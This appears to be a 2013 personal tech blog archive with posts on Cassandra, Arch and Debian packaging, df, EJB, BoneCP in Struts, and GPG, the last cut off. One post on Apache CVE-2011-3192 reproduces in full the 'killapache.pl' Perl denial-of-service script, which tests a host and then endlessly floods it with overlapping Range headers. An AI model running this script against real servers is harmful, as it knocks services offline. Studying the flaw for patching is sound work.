        long hash = MurmurHash.hash3_x64_128(key, key.position(), key.remaining(), 0)[0];
        return new LongToken(normalize(hash));
    }

    public static void main(String[] args) {
        System.out.println(genToken("jim"));
    }

    private static long normalize(long v) {
        // We exclude the MINIMUM value; see getToken()
        return v == Long.MIN_VALUE ? Long.MAX_VALUE : v;
    }
}

 


With jim, the generated token is 2680261686609811218, so that should be correct. Something extra: if you use nodetool to show the token ranges, e.g. nodetool -h localhost describering jw_schema1, the generated token gives you an idea of which range it falls in, and hence which nodes are responsible for holding that row's data.

Allocate jvm heap more than 8GB for cassandra

What happens if you allocate more than 8GB of jvm heap for a cassandra instance? In my past experience, we allocated more than 16GB for the cassandra instance and it still ran fine, but we occasionally encountered performance issues once the heap went above 16GB. Googling a little, I found this doc:

Excessive heap space size

DataStax recommends using the default heap space size for most use
cases. Exceeding this size can impair the Java virtual machine's
(JVM) ability to perform fluid garbage collections (GC). The
following table shows a comparison of heap space performances
reported by a Cassandra user:

Heap    CPU utilization    Queries per second      Latency
40 GB   50%                750                     1 second
8 GB    5%                 8500 (not maxed out)    10 ms

For information on heap sizing, see Tuning Java resources.


As the benchmark indicates, the more heap you allocate, the higher the cpu utilization, and the performance decrease is not linear but rather exponential. So it is wise to keep the heap at 8GB, or not more than 50% of the system memory, whichever is smaller. It is not deadly, but it certainly decreases the performance of the cluster dramatically, which can render it useless. If you encounter memory errors in the log, then apart from other factors, it is better to consider scaling your cluster horizontally, that is, adding more nodes to increase capacity.

So what really happens in the gc if a large heap is allocated? Well, an excerpt from the guru:

..the concurrent mark/sweep phase runs concurrently with your
application. CMS will cause a stop-the-world full pause if it fails to
complete a CMS sweep in time and you hit the maximum heap size, but
unless that happens, CMS will run concurrently (though there are
stop-the-world pauses involved, that are typically very short, the
mark/sweep phase is concurrent).


Hence, if you really hit a stop-the-world situation, the node is rendered useless: it is so busy doing gc that cassandra cannot perform.

http://www.mail-archive.com/user@cassandra.apache.org/msg17481.html
http://www.mail-archive.com/user@cassandra.apache.org/msg32312.html

Tuesday, October 15, 2013

arch install/remove/search packages

Much like debian with aptitude, archlinux has its own tool to add and remove packages.

pacman is the package handler on arch; as on debian, there is more than one tool for the job, but pacman is the stock one, like apt-get is on debian. The commands I list here are the minimum you have to know to handle packages on archlinux. pacman is a command-line tool.

pacman <options> packag1 pack2

to update: pacman -Syu

to install: pacman -S package1

to remove: pacman -R package1

to search: pacman -Ss pack-x

It is always good practice to run pacman -Sy before any install, to be sure you get the latest packages.

Like on debian, all dependencies are resolved by pacman.

These are just the most commonly used commands; for full information, see the archwiki or man pacman.

cassandra 2.0 catch 101 - part1 - correct cassandra Unsupported major.minor version 51.0

This is another entry in the series on my journey to cassandra 2.0; if you have not read the previous post, you can read it here.

Cassandra 2.0 requires jdk 7.0 or later. If your system has jdk 6 running and configured, it is still possible to run cassandra 2.0 with jdk 7, that is, to make them co-exist. Download the jdk and extract it to a directory, e.g. /usr/lib/jvm, then add JAVA_HOME=/usr/lib/jvm/jdk1.7.0_04/ to /etc/default/cassandra. This exports the variable JAVA_HOME to the environment so that jdk 7 is used to start cassandra successfully.

Because the above setting works for the cassandra instance only, we set up another environment for the admin tools that come with it. This makes sure we don't break our existing work. If you want the environment to apply only to yourself, create a file in your home directory, $HOME/.cassandra.in.sh. Below is the content.
JAVA_HOME=/usr/lib/jvm/jdk1.7.0_04
. /usr/share/cassandra/cassandra.in.sh

The first line is the same as before, but in the second line we source the additional environment settings for the admin tools so that they can find the java classes. With that done, you should not get the error Unsupported major.minor version 51.0 shown below anymore!
Exception in thread "main" java.lang.UnsupportedClassVersionError: org/apache/cassandra/tools/NodeCmd : Unsupported major.minor version 51.0
at java.lang.ClassLoader.defineClass1(Native Method)
at java.lang.ClassLoader.defineClassCond(ClassLoader.java:631)
at java.lang.ClassLoader.defineClass(ClassLoader.java:615)
at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:141)
at java.net.URLClassLoader.defineClass(URLClassLoader.java:283)
at java.net.URLClassLoader.access$000(URLClassLoader.java:58)
at java.net.URLClassLoader$1.run(URLClassLoader.java:197)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.java:190)
at java.lang.ClassLoader.loadClass(ClassLoader.java:306)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:301)
at java.lang.ClassLoader.loadClass(ClassLoader.java:247)
Could not find the main class: org.apache.cassandra.tools.NodeCmd. Program will exit.

Sunday, October 13, 2013

Changing default application that start a file

Sometimes the default configuration of an operating system installation is not the way you want it to be, so this article will show you how to change the application that opens a file. Note that this article applies to gnome version 3.4.2 or later.

gui way
This is the easy way if you don't want to dig deep into how gnome's file-opening mechanism works. Just right click on the file and click on Properties. A pop up window associated with the selected file appears. On the Open With tab, locate the application you want the file to open with and select it.

cli way
If you want to dig a little deeper, there are many configuration files located in /usr/share/applications. These files contain information about an application, like the application name and the exec command that triggers the start of the application. Once you have located the application you want a file type to be associated with, e.g. I would like csv files to be opened with libreoffice-calc.desktop, go to the $HOME/.local/share/applications directory and locate another file, mimeapps.list. Open this file with a text editor and, under the group [Default Applications], add an entry like text/csv=libreoffice-calc.desktop, as shown below. If you want to associate more file types, consult the general mime file at /etc/mime.types and start populating your environment with default applications.
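
For reference, the relevant part of $HOME/.local/share/applications/mimeapps.list would then contain something like this (the csv entry mirrors the example above):

[Default Applications]
text/csv=libreoffice-calc.desktop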

https://developer.gnome.org/integration-guide/stable/desktop-files.html.en

Saturday, October 12, 2013

analysis graph - gangnam style view



So after a year's run, nobody on earth should be a stranger to gangnam style, the korean kpop hit song. It's impressive to see this video's youtube views break the record of the previous most-viewed holder and set itself far ahead of the rest of the top 10 most viewed youtube videos.

Numbers speak, and they represent the popularity of the content, in this case the song and the singer. In this article, I would like to share my thoughts and recollections about this song's view chart. This is just my analysis and opinion based on this graph.

When it was first released it did not gain momentum, probably because it was still new to people. But the black circle marks where the slope is at its highest. At this time, the video played all over the tv, the news played it over and over on the radio, and even on social networking websites everyone was sharing this song with everyone else. The rate of explosion was tremendous!

Then we continue to see the curve going upward, as indicated in the red circle. There was a time when a video circulated on the internet claiming the views were generated using a paid service company.. LoL.. lame.. that is, if you want your view count to go up, you pay a certain amount to a company, and they click on your video and watch it, continuously, for you. :-) But I don't think that happened for this song, because the gangnam trend was seen throughout the earth.. though it is a korean song, the impact was everywhere; we saw the public doing mob dances all over the earth.. and also the hundreds of parodies....

Though the graph is still rising, as seen in the blue circle, the view rate definitely slowed down, somewhere around april 2013; that's about a 6 month run! I think it did well, considering a good pop song usually only lasts 2-3 months... Nonetheless, true fans of Psy and newcomers watching the video kept contributing to the view rate. At this stage, Psy and his gangnam style had reached such fame that every household would know him.. maybe your pets, dog and cat, too. :-)

The record-breaking count of almost 1.8 billion views after july 2013 is really astonishing and a great achievement. If you zoom into the last part, the light yellow circle, you will see the view rate falling. I guess it is only normal that everyone gets bored with a pop song. Will it grow any higher and stay steady? Trends and time will tell; history shows there are pop songs that come back onto the charts, and with gangnam style there is a high possibility too, which would push the graph higher.

That's it for my analysis and thank you for reading.

cassandra 2.0 catch 101

This is my experience with cassandra 2.0 and cqlsh. Reading through the datastax documentation [1], sometimes you need to play around with the new tool to understand the nature of its usage. It could be a bug, it could be just some changes; nonetheless, this is my experience reading about and experimenting with cassandra 2.0. Some bugs may be fixed or changed in later cassandra releases and thus render this article invalid, so this article is only meant for cassandra 2.0 and cqlsh 4.0.0. I will add more on my journey to cassandra 2.0.


When updating the durable_writes config of a keyspace, I got errors a few times... like below.


cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : false};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : false};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 'false'};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 'false'};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 0};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 0};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 1};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 1};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : '1'};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : '1'};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : '0'};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : '0'};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 'False'};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 'False'};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 'True'};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 'True'};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : True};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : True};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : False};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : False};] reason: NullPointerException null


The fix is to specify durable_writes as its own config in the alter keyspace command, outside the replication map, as shown below. It is strange that alter keyspace is not in the cqlsh help file...


cqlsh:jw_schema1> alter keyspace jw_schema1 with durable_writes = false;
cqlsh:jw_schema1> DESCRIBE KEYSPACE jw_schema1;

CREATE KEYSPACE jw_schema1 WITH replication = {
'class': 'SimpleStrategy',
'replication_factor': '3'
} AND durable_writes = 'false';


voila!

[1] http://www.datastax.com/documentation/cassandra/2.0/webhelp/index.html#cassandra/configuration/configStorage_r.html#reference_ds_itw_wkz_1k
[2] http://cassandra.apache.org/doc/cql3/CQL.html#alterKeyspaceStmt

Friday, October 11, 2013

disk usage via command df

I'm pretty sure all of us have collections of files like documents, audio and video on our computers, so what is a simple way to check whether disk space usage is approaching the capacity the physical disk provides? For starters, I'm using a command called df; it comes from the package coreutils if you are using Fedora.

What is df?
df displays the amount of disk space available on the file system containing each file name argument.

Example usage of df?

$ df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/vg_super-lv_root
51606140 9213992 39770708 19% /
tmpfs 1977424 2348 1975076 1% /dev/shm
/dev/sda5 495844 68681 401563 15% /boot
/dev/mapper/vg_super-lv_home
92792824 60272440 27806708 69% /home


$ df /usr/share/man/man1/df.1.gz
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/vg_super-lv_root
51606140 9214012 39770688 19% /


df in technical terms
- Disk space is shown in 1K blocks by default, unless the environment variable POSIXLY_CORRECT is set, in which case 512-byte blocks are used.
- if a partition is not mounted, it will not be shown in the df report.


As the example usage above shows, the default output is not very human readable; we have to add parameters to the df command to make the report much more readable. I summarize below some of the parameters I frequently use, with descriptions, but if you want the full list, run man df to see all parameters available to df.

-h, with this parameter, it outputs human readable sizes, such as KiB and MiB.

-H, with this parameter, it outputs human readable sizes too, but uses powers of 1000, not 1024. You have probably noticed that hard disk manufacturers normally use this unit to measure capacity.

-T, with this parameter, it shows an additional column called Type with the type of filesystem each partition is formatted with.

--total, with this parameter, it gives you a grand total of all the mounted filesystems in the report.
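
Combining the parameters above, a typical invocation that prints human readable sizes, a filesystem type column and a grand total row would be:

$ df -hT --total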

[debian] installing and removing with the same command

When you need to install one package and remove another, you can do it with a single command rather than two separate commands. This is achieved by appending a suffix to the package name. With the aptitude install command, a '-' suffix on a package name removes that package, while with the aptitude remove command, a '+' suffix on a package name installs that package.

# aptitude install package1 package2-

# aptitude remove package1+ package2

what pages in memory context?

When a process uses some memory, the CPU marks that RAM as used by the process. For efficiency, the CPU allocates RAM in chunks of 4K bytes (the default value on many platforms). Those chunks are called pages. Pages can be swapped to disk, etc.
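
You can check the page size on your own system with getconf; on most linux platforms it prints 4096:

$ getconf PAGESIZE
4096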

Thursday, October 10, 2013

cassandra

I've been studying cassandra recently and would like to share my findings.

What is cassandra?

Apache Cassandra is an open source, distributed, decentralized, elastically scalable, highly available, fault-tolerant, tuneably consistent, column-oriented database.

Cassandra is an open source distributed database management system. It is designed to handle very large amounts of data spread out across many commodity servers while providing a highly available service with no single point of failure.

Cassandra provides a structured key-value store with eventual consistency. Keys map to multiple values, which are grouped into column families. The column families are fixed when a Cassandra database is created, but columns can be added to a family at any time. Furthermore, columns are added only to specified keys, so different keys can have different numbers of columns in any given family. The values from a column family for each key are stored together, making Cassandra a hybrid between a column-oriented DBMS and a row-oriented store.

where is cassandra used?
Well, you can store whatever you want; for example, we used cassandra to store call detail records.

where do i get started learning cassandra?
I suggest you start with a cassandra book aimed at beginners or people coming from an RDBMS, because cassandra introduces new terminology. Once you get a hold on cassandra, you should really get the source from the apache cassandra website; they also have great information in their wiki pages.

where do i get help if i have a question?
There are mailing lists where you can check whether your question has been asked before, or you can contact me. :-)

Enterprise JavaBeans

1. What is EJB?
Enterprise JavaBeans is a managed, server-side component architecture for modular construction of enterprise applications.

2. What is feature of EJB?
EJB provides stateless session beans, which are an efficient avenue for distributed transactions. It also provides remoting and transaction support where simple POJOs do not.

3. Where is EJB best used at?
You should use ejb if it solves a problem for you that one of the lightweight frameworks does not. For example: clustering, fail-over, distributed caching and administration tools.

4. should we use ejb 2.0 or ejb 3.0 when starting out to learn ejb?
excerpt from stackoverflow.com [4]
The goal of EJB 3.0 is to target ease of development, the main theme of the JAVA EE 5 platform release. EJB 3.0 is a major simplification over the APIs defined by the EJB 2.1 and earlier specifications. The simplified EJB 3.0 API allows developers to program EJB components as ordinary Java objects with ordinary Java business interfaces rather than as heavyweight components. Both component and client code are simplified, and the same tasks can be accomplished in a simpler way, with fewer lines of code. Because it is much simpler, EJB 3.0 is also much faster to learn to use than EJB 2.1.

5. Any book describing EJB which you recommend?
Enterprise JavaBeans 3.1 [5]

6. Show me example of codes that EJB are used at?
In a web environment:

web.xml

<ejb-ref>
  <ejb-ref-name>ejb/userManagerBean</ejb-ref-name>
  <ejb-ref-type>Session</ejb-ref-type>
  <home>gha.ywk.name.entry.ejb.usermanager.UserManagerHome</home>
  <remote>what should go here??</remote>
</ejb-ref>


class Foo
{
    public UserManager getUserManager() throws HUDException
    {
        String ROLE_JNDI_NAME = "ejb/userManagerBean";

        try
        {
            Properties props = System.getProperties();
            Context ctx = new InitialContext(props);
            UserManagerHome userHome = (UserManagerHome) ctx.lookup(ROLE_JNDI_NAME);
            UserManager userManager = userHome.create();
            WASSSecurity user = userManager.getUserProfile("user101", null);
            return userManager;
        }
        catch (NamingException e)
        {
            log.error("Error occurred while getting EJB UserManager " + e);
            return null;
        }
        catch (RemoteException ex)
        {
            log.error("Error occurred while getting EJB UserManager" + ex);
            return null;
        }
        catch (CreateException ex)
        {
            log.error("Error occurred while getting EJB UserManager" + ex);
            return null;
        }
    }
}

// create a home interface
// a remote EJB object - extends javax.ejb.EJBHome
// a local EJB object - extends javax.ejb.EJBLocalHome
public interface MyBeanRemoteHome extends javax.ejb.EJBHome
{
    MyBeanRemote create() throws javax.ejb.CreateException, java.rmi.RemoteException;
}

// create a business interface in order to define business logic in our
// ejb object

// a remote EJB object - extends javax.ejb.EJBObject
// a local EJB object - extends javax.ejb.EJBLocalObject
public interface MyBeanRemote extends javax.ejb.EJBObject
{
    void doSomething() throws java.rmi.RemoteException;
}

// our ejb
public class MyBean implements javax.ejb.SessionBean
{
    // why a create method? Take a special look at the EJB Home details (above)
    public void create()
    {
        System.out.println("create");
    }

    public void doSomething() throws java.rmi.RemoteException
    {
        // some code
    }
}


ejb-jar.xml


<?xml version='1.0' encoding='UTF-8'?>
<ejb-jar xmlns='http://java.sun.com/xml/ns/j2ee' xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' xsi:schemaLocation='http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/ejb-jar_2_1.xsd' version='2.1'>
  <enterprise-beans>
    <session>
      <ejb-name>HelloWorldEJB</ejb-name>
      <home>br.com.MyBeanRemoteHome</home>
      <remote>br.com.MyBeanRemote</remote>
      <local-home>br.com.MyBeanLocalHome</local-home>
      <local>br.com.MyBeanLocal</local>
      <ejb-class>br.com.MyBean</ejb-class>
      <session-type>Stateless</session-type>
      <transaction-type>Container</transaction-type>
    </session>
  </enterprise-beans>
</ejb-jar>


and put it in the META-INF directory, so the jar contains:


/META-INF/ejb-jar.xml
br.com.MyBean.class
br.com.MyBeanRemote.class
br.com.MyBeanRemoteHome.class


now our EJB 3.0 equivalent:


// or @Local
// You cannot put @Remote and @Local at the same time
@Remote
public interface MyBean
{
void doSomething();
}

@Stateless
public class MyBeanStateless implements MyBean
{

public void doSomething()
{

}

}
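
To call the EJB 3.0 bean, a client either injects it with @EJB inside the container, or looks it up through JNDI. Below is a minimal client sketch; the JNDI name "MyBeanStateless/remote" is an assumption for illustration, since the actual binding depends on your application server:

import javax.naming.InitialContext;
import javax.naming.NamingException;

public class MyBeanClient
{
    public static void main(String[] args) throws NamingException
    {
        // standalone client: look the bean up through JNDI
        // (inside the container you would simply field-inject it with @EJB)
        // "MyBeanStateless/remote" is a hypothetical binding
        InitialContext ctx = new InitialContext();
        MyBean myBean = (MyBean) ctx.lookup("MyBeanStateless/remote");
        myBean.doSomething();
    }
}

Note that a standalone client also needs the server's JNDI provider properties, either in a jndi.properties file on the classpath or passed explicitly to the InitialContext constructor.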


[1] http://stackoverflow.com/questions/2506915/why-should-i-use-ejb
[2] http://www.innoq.com/blog/st/2007/03/01/java_eeejb_3_vs_spring.html
[3] http://en.wikipedia.org/wiki/Enterprise_JavaBean
[4] http://stackoverflow.com/questions/1737686/help-me-out-in-learning-ejb
[5] http://www.amazon.com/Enterprise-JavaBeans-3-1-Andrew-Rubinger/dp/0596158025/ref=sr_1_1?s=books&ie=UTF8&qid=1319341380&sr=1-1

Wednesday, October 9, 2013

how to configure bonecp 0.7.1 in struts 1.3.10

This is a response to http://stackoverflow.com/questions/9203648/how-to-do-connection-pooling-on-struts-fraework/9204790#comment11767509_9204790 where the Original Poster asked how to configure bonecp in struts. Due to the length of the howto, the environment setup, coding, and detailed guide are described here instead.

Note! This howto is not tuned for performance, nor guaranteed to work for everyone, but it serves as a guide to get bonecp working in struts 1.3. As far as I know, data-sources was removed from the struts 1.2 DTD, and thus this guide serves as functional documentation on how to configure bonecp in struts via tomcat5.


1. The environment for this howto is as below:

operating system : centos 5.6 2.6.18-238.19.1.el5
tomcat : tomcat5-5.5.23-0jpp.19.el5_6
struts : struts-1.3.10
bonecp : bonecp-0.7.1.RELEASE.jar
mysql-connector-java : mysql-connector-java-5.1.16.jar
mysql : mysql-server-5.0.95-1.el5_7.1
dependency of struts : commons-digester-1.8.jar
commons-chain-1.2.jar
commons-beanutils-1.8.0.jar
struts-taglib-1.3.10.jar
dependency of bonecp : guava-11.0.1.jar
slf4j-api-1.6.4.jar


2. Place these jar files into the tomcat common lib directory:

bonecp-0.7.1.RELEASE.jar
guava-11.0.1.jar
slf4j-api-1.6.4.jar (and slf4j-log4j if you want to)
mysql-connector-java-5.1.16.jar


3. Locate tomcat server.xml (for this example, it is /etc/tomcat5/server.xml) and, under GlobalNamingResources, add a new resource as below.

<Resource type='javax.sql.DataSource'
name='demodb'
factory='com.jolbox.bonecp.BoneCPDataSource'
driverClassName='com.mysql.jdbc.Driver'
jdbcUrl='jdbc:mysql://localhost/demo'
username='user1'
password='password1'
idleMaxAge='240'
idleConnectionTestPeriod='60'
partitionCount='3'
acquireIncrement='5'
maxConnectionsPerPartition='10'
minConnectionsPerPartition='5'
statementsCacheSize='50'
releaseHelperThreads='5'
/>
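
As a side note, if you want to sanity-check these pool settings outside of Tomcat JNDI, bonecp can also be configured programmatically. Here is a minimal sketch using the same values as above; it queries the same test table used in step 7:

import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.Statement;

import com.jolbox.bonecp.BoneCP;
import com.jolbox.bonecp.BoneCPConfig;

public class BoneCPCheck
{
    public static void main(String[] args) throws Exception
    {
        // load the mysql driver, the same jar placed in tomcat common lib
        Class.forName("com.mysql.jdbc.Driver");

        BoneCPConfig config = new BoneCPConfig();
        config.setJdbcUrl("jdbc:mysql://localhost/demo");
        config.setUsername("user1");
        config.setPassword("password1");
        config.setPartitionCount(3);
        config.setMinConnectionsPerPartition(5);
        config.setMaxConnectionsPerPartition(10);

        BoneCP pool = new BoneCP(config);    // creates and fills the pool
        Connection conn = pool.getConnection();
        Statement stmt = conn.createStatement();
        ResultSet rst = stmt.executeQuery("select username from test");
        while (rst.next())
        {
            System.out.println("User Name is: " + rst.getString("username"));
        }
        rst.close();
        stmt.close();
        conn.close();                        // returns the connection to the pool
        pool.shutdown();
    }
}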


4. Locate tomcat context.xml (for this example, it is /etc/tomcat5/context.xml) and add a resource link.

<!-- The contents of this file will be loaded for each web application -->
<Context>

<!-- Default set of monitored resources -->
<WatchedResource>WEB-INF/web.xml</WatchedResource>

<!-- Uncomment this to disable session persistence across Tomcat restarts -->
<!--
<Manager pathname='' />
-->

<ResourceLink global='demodb' name='demodb' type='javax.sql.DataSource'/>


</Context>



5. Then, the struts-config.xml:

<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE struts-config PUBLIC
'-//Apache Software Foundation//DTD Struts Configuration 1.3//EN'
'http://jakarta.apache.org/struts/dtds/struts-config_1_3.dtd'>

<struts-config>

<form-beans>
<form-bean name='helloWorldForm' type='com.e2e.form.HelloWorldForm' />
</form-beans>

<action-mappings>
<action path='/helloWorld' type='com.e2e.action.HelloWorldAction'
name='helloWorldForm'>
<forward name='success' path='/HelloWorld.jsp' />
</action>
<action path='/DataSource' type='com.e2e.action.TestDataSource'>
<forward name='success' path='/success.jsp'></forward>
</action>
</action-mappings>

</struts-config>


6. Then the web descriptor, web.xml:

<!DOCTYPE web-app PUBLIC
'-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN'
'http://java.sun.com/dtd/web-app_2_3.dtd' >

<web-app>
<display-name>bonecp-struts</display-name>

<servlet>
<servlet-name>action</servlet-name>
<servlet-class>
org.apache.struts.action.ActionServlet
</servlet-class>
<init-param>
<param-name>config</param-name>
<param-value>
/WEB-INF/struts-config.xml
</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>

<servlet-mapping>
<servlet-name>action</servlet-name>
<url-pattern>*.do</url-pattern>
</servlet-mapping>

<resource-ref>
<description>struts-bonecp</description>
<res-ref-name>demodb</res-ref-name>
<res-type>javax.sql.DataSource</res-type>
<res-auth>Container</res-auth>
</resource-ref>

</web-app>


7. Then TestDataSource.java:

package com.e2e.action;

import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.sql.DataSource;

import org.apache.struts.action.Action;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;

public class TestDataSource extends Action
{
    public ActionForward execute(ActionMapping mapping,
                                 ActionForm form,
                                 HttpServletRequest request,
                                 HttpServletResponse response) throws Exception
    {
        javax.sql.DataSource dataSource;
        java.sql.Connection myConnection = null;
        try
        {
            dataSource = getDataSource(request);
            if (dataSource == null)
            {
                System.out.println("datasource is null");
                return mapping.findForward("success");
            }
            myConnection = dataSource.getConnection();
            Statement stmt = myConnection.createStatement();
            ResultSet rst = stmt.executeQuery("select username from test");
            System.out.println("******************************************");
            System.out.println("********Out Put from TestDataSource ******");
            while (rst.next())
            {
                System.out.println("User Name is: " + rst.getString("username"));
            }
            System.out.println("******************************************");
            rst.close();
            stmt.close();
            // do what you wish with myConnection
        }
        catch (SQLException sqle)
        {
            getServlet().log("Connection.process", sqle);
        }
        finally
        {
            // enclose this in a finally block to make sure the connection
            // is closed and returned to the pool
            try
            {
                if (myConnection != null)
                {
                    myConnection.close();
                }
            }
            catch (SQLException e)
            {
                getServlet().log("Connection.close", e);
            }
        }

        return mapping.findForward("success");
    }

    private DataSource getDataSource(HttpServletRequest request) throws NamingException
    {
        // the resource link in context.xml exposes the global 'demodb'
        // datasource under java:comp/env
        Context ctx = new InitialContext();
        DataSource ds = (DataSource) ctx.lookup("java:comp/env/demodb");
        return ds;
    }
}


8. Create a simple jsp page, success.jsp, at the web application root (struts-config.xml above forwards to /success.jsp):

<%@ page language='java' contentType='text/html; charset=UTF-8'
pageEncoding='UTF-8'%>
<!DOCTYPE html PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN' 'http://www.w3.org/TR/html4/loose.dtd'>
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<title>Insert title here</title>
</head>
<body>
OK
</body>
</html>


9. Finally, hit the link http://<hostname>:8080/bonecp-struts/DataSource.do
You should see an OK in the browser, and if you tail the log in the tomcat log directory (in this example, it is /var/log/tomcat5/catalina.out), you should see the data retrieved from the database and printed.

apache httpd vulnerability CVE-2011-3192

What is the vulnerability about?
The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086. see [4] for more information.

What actually happens on a vulnerable system?
See the video [2], which shows a spike in the httpd processes on the system as well as heavy consumption of CPU cycles and memory.

Has it been fixed?
yes, see [3]

What is the rpm for this fix?
To be exact, it is fixed in apache version 2.2.20, and the fix is available in the 2.2.3-53.el5.centos.1 rpm. For more information, see [5].

Is there a way to check if a system is vulnerable?
yes, you can use the script below.

#!/usr/bin/perl
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
    print "Apache Remote Denial of Service (memory exhaustion)\n";
    print "by Kingcope\n";
    print "usage: perl killapache.pl <host> [numforks]\n";
    print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";

    $pm = new Parallel::ForkManager($numforks);

    $|=1;
    srand(time());
    # build a Range header with 1300 overlapping byte ranges
    $p = "";
    for ($k=0;$k<1300;$k++) {
        $p .= ",5-$k";
    }

    for ($k=0;$k<$numforks;$k++) {
        my $pid = $pm->start and next;

        $x = "";
        my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                         PeerPort => "80",
                                         Proto    => 'tcp');

        $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
        print $sock $p;

        while(<$sock>) {
        }
        $pm->finish;
    }
    $pm->wait_all_children;
    print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                     PeerPort => "80",
                                     Proto    => 'tcp');

    $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
    print $sock $p;

    # a 206 Partial Content reply means the byterange filter handled the request
    $x = <$sock>;
    if ($x =~ /Partial/) {
        print "host seems vuln\n";
        return 1;
    } else {
        return 0;
    }
}

if ($#ARGV < 0) {
    usage;
    exit;
}

if ($#ARGV > 0) {
    $numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
    print "Host does not seem vulnerable\n";
    exit;
}

while(1) {
    killapache();
}


[1] http://seclists.org/fulldisclosure/2011/Aug/281
[2] http://www.youtube.com/watch?v=3al1lsvFSpA
[3] https://bugzilla.redhat.com/show_bug.cgi?id=732928
[4] https://www.redhat.com/security/data/cve/CVE-2011-3192.html
[5] https://www.apache.org/dist/httpd/Announcement2.2.html

Monday, October 7, 2013

Gnu Privacy Guard (GPG) introduction

1. what is gpg?
GNU Privacy Guard (GnuPG or GPG) is a GPL licensed alternative to
the PGP suite of cryptographic software.

2. where is it used?
excerpt from wikipedia [3]
Although the basic GnuPG program has a command line interface,
there exist various front-ends that provide it with a graphical user
interface. For example, GnuPG encryption support has been integrated
into KMail and Evolution, the graphical e-mail clients found in KDE
and GNOME, the most popular Linux desktops. There are also
